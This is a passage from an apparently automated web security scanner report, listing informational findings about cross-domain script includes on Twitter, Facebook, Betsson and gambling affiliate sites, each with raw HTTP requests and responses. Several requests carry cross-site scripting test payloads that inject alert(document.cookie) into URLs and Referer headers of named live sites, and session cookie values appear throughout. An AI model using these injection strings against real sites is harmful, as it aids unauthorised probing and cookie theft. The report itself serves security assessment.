ETag: "de9673ab5bac9a85dedd4caeafe3f4e2"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00948
Content-Type: text/html; charset=utf-8
Content-Length: 48033
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 902d2adaaadcd4c50d07311d00ce36d2fb541db9
Set-Cookie: k=173.193.214.243.1305547124198035; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712420572627; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCO4trPgvAToHaWQiJWYxODc0MTk2MjM0Mjgw%250AZDhiYTA3NjMyOGM0NzNiN2M5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa86eb668ddb62cafcb9697b322fc64f12da4063; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.129. http://twitter.com/crazyscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crazyscratch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-24586-58491
ETag: "d6f21384f100129309a8c66fccb1ac7d"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00873
Content-Type: text/html; charset=utf-8
Content-Length: 47490
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e6ed5ddb8758b31406ef9cd22c304eb256d1c6ac
Set-Cookie: k=173.193.214.243.1305547124050568; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712405667445; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFotrPgvAToHaWQiJTAzZjUxZWIyNmM4ZGVi%250AMDllY2QyMDI3YjhmMWQ2M2JkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--593c1ebfebc2e5eb6e907ba040cf743ef29a279e; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.130. http://twitter.com/ukscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ukscratch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547123-20423-53593
ETag: "ab5f42b56a9a549a2367ddad1fefb082"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:43 GMT
X-Runtime: 0.00833
Content-Type: text/html; charset=utf-8
Content-Length: 23894
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 37f116a865ccfb3e22b1c38efd73db8ddb6854e5
Set-Cookie: k=173.193.214.243.1305547123976604; path=/; expires=Mon, 23-May-11 11:58:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712398340369; path=/; expires=Wed, 15 Jun 2011 11:58:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBAtrPgvAToHaWQiJTA2ZmQ5MzM0MjQxNzI4%250ANWRmZTU4MGM2YzQ1ZjNiNWRjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a6c952001d0836b81d2cff483ca79969f1db4eaf; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1305324702/javascripts/twitter.js?1304530346" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/jquery.tipsy.min.js?1304530346" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1305324702/javascripts/lib/gears_init.js?1304530346" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/geov1.js?1304530348" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/api.js?1304530346" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1305324702/javascripts/lib/mustache.js?1304530346" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1305324702/javascripts/dismissable.js?1304530346" type="text/javascript"></script>
...[SNIP]...

19.131. http://www.affiliatelounge.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.affiliatelounge.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.affiliatelounge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Sun, 15 May 2011 12:35:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 21563

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_HtmlElement" xmlns="http://www.w3.org/1999/xhtml" lang
...[SNIP]...
<link rel="icon" type="image/ico" href="favicon.ico" />
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

19.132. https://www.aspireaffiliates.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.133. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:05:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.134. https://www.aspireaffiliates.com/marketing-samples/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.135. https://www.aspireaffiliates.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

19.136. https://www.betsson.com/start/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/en/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/startpage/en/df_StartPageJavaScript_v19738.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.137. https://www.betsson.com/start/is/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/is/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJsRoot_v23775.js"></script>
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/startpage/is/df_StartPageJavaScript_v7723.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreFontLibrary_is_v5508.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/is/df_CoreJavaScriptV2_v22587.js"></script>
...[SNIP]...

19.138. https://www.betsson.com/web/en/sportsbook/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /web/en/sportsbook/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.139. http://www.bigmoneyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.bigmoneyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=f5jure3lb3c4ja5502em2o55; path=/; HttpOnly
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 47633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">
   
<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.140. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/LnZ1HDCjD4N.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.141. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.142. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=RTfEP; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.1.35
X-Cnection: close
Date: Mon, 16 May 2011 12:47:13 GMT
Content-Length: 35595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

19.143. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
